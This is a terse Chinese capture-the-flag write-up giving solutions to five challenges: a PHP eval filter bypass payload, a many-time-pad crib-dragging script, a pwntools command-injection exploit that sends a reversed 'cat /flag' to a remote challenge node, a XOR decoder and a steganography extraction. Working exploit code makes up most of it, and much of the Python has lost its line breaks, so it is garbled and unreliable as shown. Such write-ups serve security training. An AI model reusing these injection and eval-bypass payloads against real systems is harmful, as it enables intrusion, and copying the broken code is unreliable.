1
strlen()长度要与exam的相同(return'71f158cb1d484b7a54f6c004b943687c4c66015';长49)
正则匹配,与后面===强比较条件,考虑绕过:
eval()执行php代码 <?php ?> 短标签<? ?>和<?= ?>(代码结束必须有;)
?flag=
$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111其中'可以用%27(url编码)
2
import Crypto.Util.strxor as xo
import libnum, codecs, numpy as npdef isChr(x):if ord('a') <= x and x <= ord('z'): return Trueif ord('A') <= x and x <= ord('Z'): return Truereturn Falsedef infer(index, pos):if msg[index, pos] != 0:returnmsg[index, pos] = ord(' ')for x in range(len(c)):if x != index:msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')def know(index, pos, ch):msg[index, pos] = ord(ch)for x in range(len(c)):if x != index:msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)dat = []def getSpace():for index, x in enumerate(c):res = [xo.strxor(x, y) for y in c if x!=y]f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))cnt = [f(pos) for pos in range(len(x))]for pos in range(len(x)):dat.append((f(pos), index, pos))c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]msg = np.zeros([len(c), len(c[0])], dtype=int)getSpace()dat = sorted(dat)[::-1]
for w, index, pos in dat:infer(index, pos)know(10, 21, 'y')
know(8, 14, 'n')print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))key = xo.strxor(c[0], ''.join([chr(c) for c in msg[0]]).encode())
print(key)3
逆读接着system
from pwn import *
context(log_level='debug',os='linux')
p=remote('node4.anna.nssctf.cn',28299)
comm='cat /flag'
a=comm[::-1]
p.sendlineafter('lleT:',a)
p.interactive()
4
data="xIrCj~<r|2tWsv3PtI\x7Fzndka"
flag=""
for i in range(24):flag+=chr((ord(data[i])^6)-1)
print(flag)
print(flag[::-1])
5
BMP改PNG文字头:(IHDR)
PNG图片,blue 0【通道】发现JPG的字节流,不过是逆序的P...P....Save Bin保存出来后,使用Python简单处理即可
from binascii import *with open('blue0', 'rb') as f:hex_data = hexlify(f.read())[::-1]with open('flag.jpg', 'wb') as f1:for i in range(0, len(hex_data), 2):f1.write(unhexlify(hex_data[i:i+2][::-1]))
在得到的数据中,找到离文件尾FF D9最近的文件头FF D8。另存出这一段数据为jpg即可得到fla